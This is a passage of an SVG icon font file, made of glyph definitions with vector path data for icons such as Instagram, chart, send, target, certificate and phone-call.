c-0.125977 -0.0244141 -0.25293 -0.0380859 -0.379883 -0.0566406c-0.115234 -0.0175781 -0.229492 -0.0400391 -0.345703 -0.0507812c-0.212891 -0.0214844 -0.426758 -0.0292969 -0.641602 -0.0322266c-0.0302734 0 -0.0595703 -0.00390625 -0.0908203 -0.00390625
h-215.745c-20.0518 0 -36.3652 16.3125 -36.3652 36.3643v51.9922c0 4.1416 3.3584 7.5 7.5 7.5c4.14258 0 7.5 -3.3584 7.5 -7.5v-51.9922c0 -11.7803 9.58398 -21.3643 21.3652 -21.3643h208.245v75.3975c0 4.1416 3.3584 7.5 7.5 7.5h75.3975v144.188
c0 4.1416 3.3584 7.5 7.5 7.5zM338.174 47.7686v-57.292l57.292 57.292h-57.292zM151.187 273.234l-14.833 14.833c-2.92871 2.92871 -2.92871 7.67676 0 10.6064c2.92773 2.92871 7.67676 2.92871 10.6055 0l9.53027 -9.53027l22.3037 22.3037
c2.92871 2.92969 7.67773 2.92969 10.6064 0c2.92871 -2.92773 2.92871 -7.67676 0 -10.6055l-27.6074 -27.6074c-1.46387 -1.46484 -3.38379 -2.19629 -5.30273 -2.19629s-3.83887 0.732422 -5.30273 2.19629zM247.346 302.488c-4.1416 0 -7.5 3.3584 -7.5 7.5
c0 4.14258 3.3584 7.5 7.5 7.5h105.072c4.1416 0 7.5 -3.35742 7.5 -7.5c0 -4.1416 -3.3584 -7.5 -7.5 -7.5h-105.072zM247.346 267.194c-4.1416 0 -7.5 3.3584 -7.5 7.5c0 4.14258 3.3584 7.5 7.5 7.5h37.084c4.14258 0 7.5 -3.35742 7.5 -7.5
c0 -4.1416 -3.35742 -7.5 -7.5 -7.5h-37.084zM136.354 182.791c-2.92969 2.92871 -2.92969 7.67773 0 10.6064c2.92773 2.92871 7.67676 2.92969 10.6055 0l9.53027 -9.53125l22.3037 22.3037c2.92871 2.92871 7.67773 2.92871 10.6064 0
c2.92871 -2.92773 2.92871 -7.67676 0 -10.6055l-27.6074 -27.6074c-1.40527 -1.40723 -3.31348 -2.19727 -5.30273 -2.19727s-3.89648 0.790039 -5.30273 2.19727zM247.346 197.211c-4.1416 0 -7.5 3.3584 -7.5 7.5s3.3584 7.5 7.5 7.5h105.072
c4.1416 0 7.5 -3.3584 7.5 -7.5s-3.3584 -7.5 -7.5 -7.5h-105.072zM247.346 161.916c-4.1416 0 -7.5 3.3584 -7.5 7.5s3.3584 7.5 7.5 7.5h37.084c4.14258 0 7.5 -3.3584 7.5 -7.5s-3.35742 -7.5 -7.5 -7.5h-37.084zM247.346 91.9336c-4.1416 0 -7.5 3.35742 -7.5 7.5
c0 4.1416 3.3584 7.5 7.5 7.5h105.072c4.1416 0 7.5 -3.3584 7.5 -7.5c0 -4.14258 -3.3584 -7.5 -7.5 -7.5h-105.072zM247.346 56.6387c-4.1416 0 -7.5 3.35742 -7.5 7.5c0 4.1416 3.3584 7.5 7.5 7.5h37.084c4.14258 0 7.5 -3.3584 7.5 -7.5
c0 -4.14258 -3.35742 -7.5 -7.5 -7.5h-37.084zM162.876 48.9453c-18.9023 0 -34.2822 15.3789 -34.2822 34.2832s15.3789 34.2832 34.2822 34.2832c18.9043 0 34.2832 -15.3789 34.2832 -34.2832s-15.3799 -34.2832 -34.2832 -34.2832zM162.876 102.512
c-10.6318 0 -19.2822 -8.65039 -19.2822 -19.2832s8.64941 -19.2832 19.2822 -19.2832c10.6338 0 19.2832 8.65039 19.2832 19.2832s-8.65039 19.2832 -19.2832 19.2832z" />
    <glyph glyph-name="042-interface" unicode="&#xf126;" 
d="M0 175.665l47.665 48.002l127.666 -127.665l288.335 288l48.334 -47.666l-336.669 -336.337z" />
    <glyph glyph-name="082-instagram" unicode="&#xf147;" 
d="M352 448c88.3516 0 160 -71.6484 160 -160v-192c0 -88.3516 -71.6484 -160 -160 -160h-192c-88.3516 0 -160 71.6484 -160 160v192c0 88.3516 71.6484 160 160 160h192zM464 96v192c0 61.7598 -50.2402 112 -112 112h-192c-61.7598 0 -112 -50.2402 -112 -112v-192
c0 -61.7598 50.2402 -112 112 -112h192c61.7598 0 112 50.2402 112 112zM256 320c70.6885 0 128 -57.3115 128 -128s-57.3115 -128 -128 -128s-128 57.3115 -128 128s57.3115 128 128 128zM256 112c44.0957 0 80 35.9043 80 80c0 44.1279 -35.9043 80 -80 80
s-80 -35.8721 -80 -80c0 -44.0957 35.9043 -80 80 -80zM376.544 329.6c0 9.41992 7.63672 17.0566 17.0557 17.0566c9.41992 0 17.0566 -7.63672 17.0566 -17.0566c0 -9.41895 -7.63672 -17.0557 -17.0566 -17.0557c-9.41895 0 -17.0557 7.63672 -17.0557 17.0557z" />
    <glyph glyph-name="065-null-3" unicode="&#xf13b;" 
d="M202.01 119.387c-1.93457 0 -3.88281 0.665039 -5.47168 2.01855l-54.6982 46.5762c-1.88672 1.6084 -2.97168 3.95703 -2.97168 6.43848c0 2.47656 1.08984 4.8252 2.97168 6.43359l54.6982 46.5762c3.55176 3.02832 8.88672 2.59863 11.915 -0.953125
c3.02344 -3.55664 2.59863 -8.8916 -0.958008 -11.915l-47.1367 -40.1416l47.1367 -40.1416c3.55664 -3.02832 3.98145 -8.36328 0.958008 -11.915c-1.6748 -1.9668 -4.05176 -2.97656 -6.44336 -2.97656zM202.01 119.387zM309.99 119.387
c-2.3916 0 -4.76855 1.00977 -6.43848 2.97656c-3.02832 3.55176 -2.59863 8.88672 0.953125 11.915l47.1367 40.1416l-47.1367 40.1416c-3.55176 3.02344 -3.98145 8.3584 -0.953125 11.915c3.02344 3.55176 8.36328 3.98145 11.9102 0.953125l54.6982 -46.5762
c1.88672 -1.6084 2.97168 -3.95703 2.97168 -6.43359c0 -2.48145 -1.08496 -4.83008 -2.97168 -6.43848l-54.6982 -46.5762c-1.58887 -1.35352 -3.53711 -2.01855 -5.47168 -2.01855zM309.99 119.387zM236.637 84.4531c-0.580078 0 -1.16504 0.0605469 -1.75488 0.183594
c-4.56543 0.961914 -7.49023 5.44824 -6.52832 10.0146l34.0898 161.854c0.961914 4.56543 5.44336 7.49023 10.0146 6.52832c4.56543 -0.962891 7.49023 -5.44336 6.52832 -10.0146l-34.0898 -161.854c-0.839844 -3.98145 -4.34961 -6.71191 -8.25977 -6.71191z
M236.637 84.4531zM455.245 -3.72656h-398.49c-31.293 0 -56.7549 25.458 -56.7549 56.7549v338.217c0 31.293 25.4619 56.7549 56.7549 56.7549h398.49c31.293 0 56.7549 -25.4619 56.7549 -56.7549v-338.217c0 -31.2969 -25.4619 -56.7549 -56.7549 -56.7549z
M56.7549 431.095c-21.9717 0 -39.8496 -17.8779 -39.8496 -39.8496v-338.217c0 -21.9717 17.8779 -39.8486 39.8496 -39.8486h398.49c21.9717 0 39.8496 17.877 39.8496 39.8486v338.217c0 21.9717 -17.8779 39.8496 -39.8496 39.8496h-398.49zM56.7549 431.095z
M503.547 312.646h-495.094c-4.66992 0 -8.45312 3.7832 -8.45312 8.45215c0 4.66504 3.7832 8.45312 8.45312 8.45312h495.094c4.66992 0 8.45312 -3.78809 8.45312 -8.45312c0 -4.66895 -3.7832 -8.45215 -8.45312 -8.45215zM503.547 312.646zM144.425 353.095
c-14.7451 0 -26.75 12.0039 -26.75 26.75c0 14.75 12.0049 26.75 26.75 26.75c14.75 0 26.75 -12 26.75 -26.75c0 -14.7461 -12 -26.75 -26.75 -26.75zM144.425 389.688c-5.4248 0 -9.84473 -4.41504 -9.84473 -9.84375c0 -5.42969 4.41992 -9.84473 9.84473 -9.84473
c5.42871 0 9.84375 4.41504 9.84375 9.84473c0 5.42871 -4.41504 9.84375 -9.84375 9.84375zM144.425 389.688zM62.2363 353.354c-14.75 0 -26.75 12 -26.75 26.75s12 26.75 26.75 26.75s26.75 -12 26.75 -26.75s-12 -26.75 -26.75 -26.75zM62.2363 389.948
c-5.4248 0 -9.84473 -4.41992 -9.84473 -9.84473c0 -5.42871 4.41992 -9.84375 9.84473 -9.84375c5.42871 0 9.84375 4.41504 9.84375 9.84375c0 5.4248 -4.41504 9.84473 -9.84375 9.84473zM62.2363 389.948zM226.613 352.84c-14.7451 0 -26.7451 12 -26.7451 26.75
c0 14.7451 12 26.7451 26.7451 26.7451c14.75 0 26.75 -12 26.75 -26.7451c0 -14.75 -12 -26.75 -26.75 -26.75zM226.613 389.434c-5.4248 0 -9.83984 -4.41504 -9.83984 -9.84375c0 -5.42969 4.41504 -9.84473 9.83984 -9.84473c5.42871 0 9.84473 4.41504 9.84473 9.84473
c0 5.42871 -4.41602 9.84375 -9.84473 9.84375zM226.613 389.434z" />
    <glyph glyph-name="039-chart" unicode="&#xf123;" 
d="M436.275 408.193c14.7715 0 26.7881 -12.0176 26.7891 -26.7891v-284.565c0 -14.7705 -12.0176 -26.7891 -26.7891 -26.7891h-124.904l40.5654 -120.866c1.75684 -5.23438 -1.0625 -10.9033 -6.29883 -12.6611c-1.05469 -0.353516 -2.12793 -0.522461 -3.18262 -0.522461
c-4.17969 0 -8.07617 2.63965 -9.47949 6.82129l-42.7021 127.229h-68.5459l-42.7021 -127.229c-1.40332 -4.18066 -5.2998 -6.82129 -9.47949 -6.82129c-1.05469 0 -2.12793 0.167969 -3.18262 0.522461c-5.23633 1.75781 -8.05566 7.42676 -6.29883 12.6611
l40.5664 120.866h-124.905c-14.7725 0 -26.7891 12.0186 -26.7891 26.7891v284.565c0 14.7705 12.0176 26.7891 26.7891 26.7891h131.477c4.64258 22.6875 24.7598 39.8066 48.7988 39.8066c24.0381 0 44.1543 -17.1191 48.7969 -39.8066h131.478zM256.001 428
c-12.9297 0 -23.9629 -8.27441 -28.0811 -19.8066h56.1631c-4.11914 11.5322 -15.1523 19.8066 -28.082 19.8066zM443.063 96.8389h-0.000976562v284.565c0 3.74219 -3.0459 6.78906 -6.78906 6.78906h-140.468h-79.6143h-140.468
c-3.74414 0 -6.78906 -3.04688 -6.78906 -6.78906v-284.565c0 -3.74219 3.0459 -6.78809 6.78906 -6.78809h31.2393v39.3369c0 5.52148 4.47754 10 10 10c5.52344 0 10 -4.47852 10 -10v-39.3369h26.7773v50.9844c0 5.52246 4.47754 10 10 10c5.52344 0 10 -4.47754 10 -10
v-50.9844h23.2207v55.0225c0 5.52246 4.47754 10 10 10c5.52344 0 10 -4.47754 10 -10v-55.0225h29.0371v104.672c0 5.52148 4.47754 10 10 10c5.52344 0 10 -4.47852 10 -10v-104.672h25.3086v79.2549c0 5.52148 4.47656 10 10 10s10 -4.47852 10 -10v-79.2549h28.084
v111.97c0 5.52246 4.47656 10 10 10s10 -4.47754 10 -10v-111.972h30.7627v142.562c0 5.52246 4.47754 10 10 10c5.52344 0 10 -4.47754 10 -10v-142.56h26.1211c3.74414 0 6.78906 3.0459 6.78906 6.78809zM410.105 341.116
c0.0332031 -0.330078 0.0507812 -0.662109 0.0478516 -0.996094v-43.1914c0 -5.52246 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10v19.0537l-90.0986 -90.0986c-1.875 -1.875 -4.41895 -2.92969 -7.07129 -2.92969c-2.65137 0 -5.19629 1.05469 -7.07129 2.92969
l-21.7969 21.7979l-72.1611 -72.1611c-3.9043 -3.9043 -10.2363 -3.9043 -14.1416 0l-21.543 21.542l-29.4199 -29.4209c-1.95215 -1.95215 -4.5127 -2.92871 -7.07129 -2.92871c-2.55957 0 -5.11816 0.976562 -7.07129 2.92871
c-3.90527 3.90625 -3.90527 10.2383 0 14.1426l36.4922 36.4922c3.90527 3.9043 10.2373 3.9043 14.1426 0l21.543 -21.543l72.1611 72.1621c1.875 1.875 4.41895 2.92871 7.07031 2.92871c2.65234 0 5.19629 -1.05371 7.07129 -2.92871l21.7969 -21.7979l83.0283 83.0283
h-19.0537c-5.52344 0 -10 4.47754 -10 10c0 5.52148 4.47656 10 10 10h43.1973c0.0595703 0 0.117188 -0.0078125 0.177734 -0.00878906c0.268555 -0.00585938 0.537109 -0.015625 0.803711 -0.0410156c0.167969 -0.0175781 0.331055 -0.046875 0.49707 -0.0722656
c0.157227 -0.0234375 0.31543 -0.0410156 0.470703 -0.0722656c0.180664 -0.0351562 0.354492 -0.0839844 0.530273 -0.128906c0.139648 -0.0361328 0.280273 -0.0664062 0.418945 -0.108398c0.169922 -0.0507812 0.333008 -0.113281 0.499023 -0.173828
c0.141602 -0.0507812 0.286133 -0.0976562 0.426758 -0.155273c0.152344 -0.0634766 0.296875 -0.136719 0.444336 -0.206055c0.149414 -0.0703125 0.298828 -0.136719 0.445312 -0.214844c0.136719 -0.0732422 0.267578 -0.15625 0.400391 -0.236328
c0.147461 -0.0878906 0.295898 -0.170898 0.44043 -0.267578c0.140625 -0.0947266 0.273438 -0.199219 0.410156 -0.301758c0.125977 -0.0927734 0.253906 -0.180664 0.375977 -0.28125c0.21875 -0.179688 0.427734 -0.37207 0.630859 -0.569336
c0.0322266 -0.03125 0.0673828 -0.0585938 0.0996094 -0.0898438c0.0332031 -0.0332031 0.0605469 -0.0703125 0.0927734 -0.103516c0.197266 -0.202148 0.388672 -0.40918 0.567383 -0.626953c0.106445 -0.128906 0.199219 -0.263672 0.296875 -0.396484
c0.0957031 -0.129883 0.196289 -0.254883 0.285156 -0.388672c0.102539 -0.151367 0.19043 -0.30957 0.283203 -0.46582c0.0742188 -0.124023 0.152344 -0.246094 0.219727 -0.373047c0.0839844 -0.157227 0.15625 -0.319336 0.231445 -0.479492
c0.0634766 -0.135742 0.130859 -0.268555 0.188477 -0.407227c0.0644531 -0.15625 0.117188 -0.31543 0.172852 -0.473633c0.0546875 -0.149414 0.112305 -0.297852 0.158203 -0.450195c0.0478516 -0.15918 0.0839844 -0.321289 0.124023 -0.482422
c0.0390625 -0.155273 0.0830078 -0.308594 0.114258 -0.466797c0.0371094 -0.1875 0.0595703 -0.375977 0.0859375 -0.564453c0.0185547 -0.134766 0.0449219 -0.266602 0.0576172 -0.40332zM109.779 340.131c0 5.52246 4.47754 10 10 10s10 -4.47754 10 -10
s-4.47754 -10 -10 -10s-10 4.47754 -10 10zM109.779 299.36c0 5.52344 4.47754 10 10 10s10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10s-10 4.47754 -10 10zM109.779 258.591c0 5.52246 4.47754 10 10 10s10 -4.47754 10 -10c0 -5.52344 -4.47754 -10 -10 -10
s-10 4.47656 -10 10z" />
    <glyph glyph-name="013-send" unicode="&#xf10c;" 
d="M186.667 72.2773l86.7627 -29.6533l-57.8779 -78.7627c-3.07129 -4.18164 -7.89355 -6.52832 -12.8848 -6.52832c-1.66406 0 -3.34961 0.255859 -4.99219 0.790039c-6.57129 2.17578 -11.0078 8.29785 -11.0078 15.21v98.9443zM505.28 445.034
c4.90625 -3.49805 7.42383 -9.42871 6.54883 -15.4023l-58.666 -394.666c-0.704102 -4.67285 -3.45605 -8.83203 -7.50977 -11.3076c-2.53906 -1.53516 -5.41895 -2.3252 -8.32031 -2.3252c-1.74902 0 -3.49805 0.298828 -5.16211 0.853516l-223.638 76.4375
l219.904 264.938l-284.182 -242.986l-133.439 45.6104c-6.03809 2.06934 -10.2832 7.53125 -10.7734 13.9307c-0.469727 6.37891 2.87988 12.4375 8.55469 15.4023l480 250.667c5.33301 2.79492 11.7754 2.3252 16.6826 -1.15234z" />
    <glyph glyph-name="018-target" unicode="&#xf111;" 
d="M136.53 240.438c-4.07812 0.727539 -6.79297 4.62305 -6.06543 8.70215c7.21094 40.3857 28.5293 77.2949 60.0273 103.931c31.876 26.9541 72.4531 41.7979 114.257 41.7979c44.5918 0 87.1973 -16.6338 119.964 -46.8379
c3.0459 -2.80859 3.23926 -7.55273 0.431641 -10.5986c-2.80664 -3.0459 -7.55371 -3.23926 -10.5977 -0.431641c-29.9893 27.6426 -68.9824 42.8672 -109.798 42.8672c-38.2627 0 -75.4014 -13.585 -104.571 -38.252c-28.835 -24.3838 -48.3477 -58.1621 -54.9453 -95.1133
c-0.649414 -3.63086 -3.81152 -6.18262 -7.375 -6.18262c-0.4375 0 -0.881836 0.0380859 -1.32715 0.118164zM395.017 118.476c-1.94043 0 -3.87988 0.749023 -5.34863 2.24316c-2.9043 2.9541 -2.86328 7.70312 0.0908203 10.6064
c23.3877 22.9893 36.2676 53.707 36.2676 86.4961c0 66.873 -54.4053 121.277 -121.278 121.277c-27.8242 0 -53.9932 -9.16406 -75.6758 -26.502c-21.0557 -16.8359 -36.0752 -40.458 -42.293 -66.5166c-0.960938 -4.03027 -5.00391 -6.5166 -9.03613 -5.55469
c-4.0293 0.960938 -6.5166 5.00684 -5.55469 9.03516c6.98926 29.292 23.8633 55.8389 47.5156 74.75c24.0225 19.209 54.2246 29.7871 85.0439 29.7871c75.1436 0 136.278 -61.1338 136.278 -136.277c0 -36.8457 -14.4736 -71.3623 -40.752 -97.1934
c-1.45996 -1.43457 -3.36035 -2.15137 -5.25781 -2.15137zM367.008 113.721c3.55273 2.13086 8.16016 0.976562 10.2891 -2.57617c2.12988 -3.55273 0.976562 -8.15918 -2.57715 -10.2881c-21.0762 -12.6357 -45.2715 -19.3135 -69.9717 -19.3135
c-37.5625 0 -72.5488 14.957 -98.5137 42.1152c-2.86328 2.99414 -2.75684 7.74219 0.237305 10.6035c2.99512 2.86328 7.74219 2.75586 10.6045 -0.237305c23.1084 -24.1709 54.2441 -37.4814 87.6719 -37.4814c21.9844 0 43.5127 5.94043 62.2598 17.1777z
M304.748 308.296c49.8887 0 90.4746 -40.5859 90.4746 -90.4746c0 -49.8896 -40.5879 -90.4766 -90.4756 -90.4766c-18.6064 0 -36.4805 5.60645 -51.6904 16.2109c-14.8574 10.3594 -26.1602 24.7275 -32.6875 41.5508c-1.49805 3.86133 0.417969 8.20703 4.2793 9.7041
c3.86133 1.49805 8.20703 -0.417969 9.7041 -4.27832c5.44531 -14.0352 14.8799 -26.0244 27.2832 -34.6719c12.6816 -8.84277 27.5889 -13.5156 43.1113 -13.5156c41.6182 0 75.4756 33.8594 75.4756 75.4766s-33.8584 75.4746 -75.4756 75.4746
c-31.1143 0 -59.4648 -19.5273 -70.5479 -48.5898c-1.47559 -3.87012 -5.81055 -5.81348 -9.68066 -4.33496c-3.86914 1.47559 -5.81055 5.80957 -4.33496 9.67969c6.46387 16.9482 17.7588 31.4326 32.665 41.8887c15.2568 10.7002 33.2021 16.3564 51.8994 16.3564z
M120.319 153.477c3.66406 -1.93164 5.06836 -6.46777 3.13574 -10.1318c-7.99414 -15.1621 -14.1279 -28.4658 -12.3525 -41.1328c5.59863 8.40918 14.2793 17.2861 26.5469 27.2959c1.7168 1.40039 3.96387 1.96777 6.14062 1.55859
c2.17676 -0.414062 4.05859 -1.76855 5.14258 -3.7002c4.84473 -8.63867 11.0693 -16.3564 19.0479 -23.5225c-0.993164 17.5605 8.05859 34.6055 16.3555 50.2305c10.957 20.6357 20.5039 38.6152 10.3223 56.2461h-55.6309
c5.60938 -15.1729 1.76074 -29.2871 -2.09863 -39.3398c-1.4834 -3.86621 -5.82324 -5.79785 -9.68848 -4.31445c-3.86719 1.48438 -5.79785 5.82324 -4.31445 9.69043c5.31836 13.8545 5.2168 24.2402 -0.451172 33.9648h-8.60352l-34.1514 -25.4316
c-1.29395 -0.963867 -2.86426 -1.48438 -4.47852 -1.48438h-67.7412c-3.05762 0 -5.80762 1.85547 -6.9541 4.69043c-1.14453 2.83496 -0.455078 6.08105 1.74512 8.20508c5.89746 5.69531 9.14551 13.3369 9.14551 21.5195c0 8.18164 -3.24805 15.8232 -9.14648 21.5195
c-2.19922 2.12402 -2.88867 5.37012 -1.74414 8.20508c1.14551 2.83398 3.89746 4.69043 6.9541 4.69043h67.7422c1.61426 0 3.18457 -0.521484 4.47852 -1.48535l34.1465 -25.4258h149.063c3.55566 19.8643 20.9473 34.9922 41.8174 34.9922
c23.4307 0 42.4941 -19.0635 42.4941 -42.4941c0 -23.4316 -19.0635 -42.4941 -42.4941 -42.4941c-20.8711 0 -38.2637 15.1299 -41.8174 34.9951h-51.7207c8.21484 -22.1309 -3.28516 -43.8096 -13.625 -63.2822c-11.6084 -21.8613 -21.6328 -40.7402 -8.29688 -59.3828
c2.08105 -2.90918 1.81836 -6.88281 -0.62793 -9.49219c-2.44629 -2.61035 -6.39355 -3.12988 -9.43262 -1.24121c-16.9775 10.5557 -29.4453 21.959 -38.6211 35.4229c-13.4082 -11.8779 -20.6924 -21.8525 -22.2061 -30.3662
c-0.52832 -2.97168 -2.78613 -5.33691 -5.72949 -6.00293c-0.550781 -0.125 -1.10547 -0.185547 -1.65527 -0.185547c-2.38672 0 -4.67285 1.1416 -6.09961 3.13672c-18.6396 26.0586 -4.82031 52.2715 5.27051 71.4111c1.93164 3.66406 6.46875 5.07031 10.1328 3.13574z
M304.748 245.314c-12.5586 0 -23.1699 -8.46875 -26.4443 -19.9932h26.4463c4.1416 0 7.5 -3.3584 7.5 -7.5c0 -4.14258 -3.3584 -7.5 -7.5 -7.5h-26.4473c3.27344 -11.5264 13.8857 -19.9951 26.4453 -19.9951c15.1611 0 27.4941 12.333 27.4941 27.4941
s-12.334 27.4941 -27.4941 27.4941zM72.7549 198.406l26.0713 19.415l-26.0713 19.415h-50.7021c2.87109 -5.97656 4.38379 -12.5693 4.38379 -19.415c0 -6.84766 -1.5127 -13.4395 -4.38379 -19.415h50.7021zM504.5 4.13672c4.1416 0 7.5 -3.35742 7.5 -7.5
c0 -4.1416 -3.3584 -7.5 -7.5 -7.5h-57.4385c-0.0234375 0 -0.0478516 -0.00488281 -0.0722656 -0.00488281h-54.3105c-0.0224609 0 -0.0449219 0.00488281 -0.0673828 0.00488281h-175.733c-0.0224609 0 -0.0449219 -0.00488281 -0.0683594 -0.00488281h-54.3096
c-0.0244141 0 -0.0478516 0.00488281 -0.0732422 0.00488281h-57.4297c-4.1416 0 -7.5 3.3584 -7.5 7.5c0 4.14258 3.3584 7.5 7.5 7.5h53.1943l41.4453 71.208c-0.672852 0.49707 -1.35742 1.01074 -2.05762 1.54102c-3.2998 2.50293 -3.94727 7.20801 -1.44434 10.5078
c2.50293 3.30078 7.20605 3.94824 10.5068 1.44434c2.55957 -1.93945 4.88867 -3.61328 7.11719 -5.11426c11.0303 -7.49805 22.9072 -13.5947 35.3281 -18.1377c17.8096 -6.51074 36.5381 -9.8125 55.6641 -9.8125c19.1533 0 37.8799 3.30176 55.6611 9.8125
c0.000976562 0.000976562 0.000976562 0.000976562 0.00195312 0.000976562h0.000976562c0.381836 0.138672 0.757812 0.293945 1.1377 0.436523c12.0332 4.50586 23.5195 10.4375 34.1494 17.6709c44.5146 30.2412 71.0889 80.3828 71.0889 134.129
c0 35.5195 -11.2754 69.2402 -32.6074 97.5127c-2.49414 3.30566 -1.83691 8.00879 1.4707 10.5039c3.30664 2.49414 8.00977 1.83594 10.5039 -1.46973c23.3105 -30.8975 35.6328 -67.7402 35.6328 -106.547c0 -56.3799 -26.7744 -109.114 -71.9473 -142.47
l41.4561 -71.2168h53.2002zM397.399 4.13672h36.5459l-36.5508 62.7871c-0.65918 -0.407227 -1.3252 -0.801758 -1.99023 -1.2002c-0.206055 -0.123047 -0.411133 -0.249023 -0.617188 -0.371094c-1.3623 -0.805664 -2.7373 -1.59082 -4.12109 -2.36035
c-0.300781 -0.166992 -0.601562 -0.333008 -0.904297 -0.498047c-1.41504 -0.776367 -2.83594 -1.53809 -4.27051 -2.27539c-0.0488281 -0.0244141 -0.0986328 -0.0488281 -0.147461 -0.0742188c-1.40137 -0.717773 -2.81445 -1.41016 -4.23438 -2.09082
c-0.299805 -0.143555 -0.597656 -0.288086 -0.897461 -0.428711c-1.42773 -0.672852 -2.86426 -1.33008 -4.30859 -1.96484c-0.258789 -0.113281 -0.518555 -0.223633 -0.777344 -0.334961c-0.62793 -0.272461 -1.25391 -0.547852 -1.88477 -0.813477zM359.112 49.2842
c-17.4922 -5.64551 -35.7451 -8.51172 -54.3623 -8.51172c-18.5938 0 -36.8467 2.86621 -54.3623 8.51465l-21.6592 -45.1504h152.034zM212.108 66.9531l-36.5615 -62.8164h36.5459l24.1748 50.3955c-8.34473 3.50586 -16.4258 7.66113 -24.1592 12.4209z" />
    <glyph glyph-name="051-certificate" unicode="&#xf12d;" 
d="M467.98 -7.76465c1.20117 -2.90234 0.634766 -6.23535 -1.45996 -8.57617c-2.09473 -2.33984 -5.34375 -3.27344 -8.3623 -2.39844l-65.9424 19.1084l-33.1172 -60.1406c-1.44141 -2.61719 -4.19043 -4.22852 -7.1543 -4.22852
c-0.151367 0 -0.301758 0.00390625 -0.454102 0.0126953c-3.13477 0.173828 -5.89453 2.12891 -7.0957 5.03125l-73.8789 178.357c-4.78418 -0.418945 -9.62305 -0.646484 -14.5156 -0.646484c-47.3916 0 -90.1621 20.1367 -120.227 52.2949l-70.1514 -169.362
l55.8926 16.1953c3.66699 1.06445 7.58789 -0.558594 9.43066 -3.90625l28.0703 -50.9746l56.8262 137.189c1.72656 4.16992 6.50586 6.14844 10.6748 4.42188s6.14844 -6.50488 4.42188 -10.6748l-63.3311 -152.895c-1.20312 -2.90234 -3.96094 -4.85742 -7.09766 -5.03223
c-0.151367 -0.0078125 -0.302734 -0.0117188 -0.453125 -0.0117188c-2.96387 0 -5.71289 1.61133 -7.15527 4.22852l-33.1162 60.1406l-65.9424 -19.1084c-3.0166 -0.874023 -6.26855 0.0585938 -8.3623 2.39844c-2.09473 2.34082 -2.66211 5.67383 -1.46094 8.57617
l79.9248 192.954c-20.4492 27.4326 -32.5674 61.4199 -32.5674 98.1875c0 90.7734 73.8496 164.623 164.623 164.623s164.622 -73.8496 164.621 -164.623c0 -80.0957 -57.501 -147.003 -133.389 -161.638l65.75 -158.737l28.0723 50.9746
c1.8418 3.34766 5.75977 4.9707 9.42871 3.90625l55.8945 -16.1953l-61.2773 147.937c-1.72852 4.16797 0.251953 8.94629 4.42188 10.6748c4.16895 1.72754 8.94727 -0.253906 10.6738 -4.42188zM107.717 283.377c0 -81.7637 66.5205 -148.282 148.283 -148.282
s148.281 66.5186 148.281 148.282c0 81.7627 -66.5186 148.282 -148.281 148.282s-148.283 -66.5195 -148.283 -148.282zM350.403 314.051c0.94043 -2.89648 0.193359 -6.0752 -1.93945 -8.24805l-39.0537 -39.7793l8.21289 -55.1367
c0.449219 -3.0127 -0.814453 -6.02344 -3.2793 -7.81445c-1.4209 -1.03223 -3.10645 -1.55957 -4.80273 -1.55957c-1.24219 0 -2.48828 0.283203 -3.6416 0.857422l-49.8994 24.8496l-49.9004 -24.8496c-2.72559 -1.35645 -5.98145 -1.08594 -8.44336 0.703125
c-2.46484 1.79102 -3.72852 4.80176 -3.2793 7.81445l8.21387 55.1367l-39.0537 39.7783c-2.13379 2.17285 -2.88086 5.35156 -1.94043 8.24805c0.941406 2.89648 3.41504 5.03027 6.41895 5.5332l54.9756 9.22559l25.7637 49.4346
c1.40723 2.7002 4.2002 4.39453 7.24512 4.39453c3.0459 0 5.83789 -1.69434 7.24512 -4.39453l25.7627 -49.4346l54.9766 -9.22559c3.00391 -0.504883 5.47852 -2.6377 6.41895 -5.5332zM294.899 274.568l30.9209 31.4941l-43.5283 7.30566
c-2.52734 0.423828 -4.70801 2.00879 -5.89355 4.28125l-20.3984 39.1406l-20.3984 -39.1396c-1.18359 -2.27246 -3.36621 -3.85742 -5.89355 -4.28125l-43.5273 -7.30566l30.9219 -31.4951c1.79492 -1.82812 2.62793 -4.39355 2.25 -6.92773l-6.50293 -43.6553
l39.5088 19.6758c1.14551 0.571289 2.39453 0.857422 3.6416 0.857422c1.24805 0 2.49512 -0.287109 3.64258 -0.857422l39.5088 -19.6758l-6.50293 43.6553c-0.37793 2.53418 0.455078 5.09863 2.25098 6.92773zM379.765 275.136
c4.47266 -0.592773 7.61914 -4.69922 7.02637 -9.1709c-8.65039 -65.292 -64.8779 -114.529 -130.791 -114.529c-72.7529 0 -131.942 59.1875 -131.942 131.941s59.1895 131.942 131.942 131.942c65.9131 0 122.141 -49.2373 130.79 -114.529
c0.59375 -4.47266 -2.55371 -8.58008 -7.02539 -9.17188c-4.4668 -0.600586 -8.58105 2.55176 -9.17285 7.02637c-7.57812 57.2002 -56.8418 100.334 -114.592 100.334c-63.7432 0 -115.602 -51.8574 -115.602 -115.602s51.8584 -115.603 115.602 -115.603
c57.749 0 107.014 43.1357 114.592 100.335c0.591797 4.47363 4.69922 7.62402 9.17285 7.02637z" />
    <glyph glyph-name="007-phone-call" unicode="&#xf106;" 
d="M404.642 130.834l59.3252 -59.541c10.9141 -10.8066 16.6416 -23.666 16.6416 -37.0654c0 -13.292 -5.61914 -26.2588 -16.3174 -37.3887c-4.64648 -4.86328 -9.40137 -9.50977 -14.0479 -13.9404c-6.80762 -6.5918 -13.292 -12.751 -18.9111 -19.5586
c-0.107422 -0.216797 -0.324219 -0.324219 -0.431641 -0.541016c-16.4258 -17.8301 -37.3896 -26.7988 -62.3516 -26.7988c-2.16113 0 -4.53809 0.108398 -6.80762 0.21582c-37.0654 2.37793 -70.2402 16.3174 -95.0938 28.0957
c-65.0527 31.4463 -122.001 76.0752 -169.332 132.592c-39.0098 46.8984 -65.1611 90.6631 -82.667 137.886c-7.13184 19.2344 -16.4248 48.627 -13.8311 80.1816c1.72852 19.5586 9.61719 36.416 23.4492 50.248l36.7402 37.0645
c0.108398 0.108398 0.108398 0.108398 0.21582 0.216797c10.8066 10.374 23.5576 15.8848 36.7412 15.8848s25.7188 -5.51074 36.2002 -15.8848c7.02441 -6.4834 13.832 -13.3994 20.3154 -20.0996c3.24219 -3.45801 6.7002 -6.91602 10.0498 -10.2656l29.501 -29.501
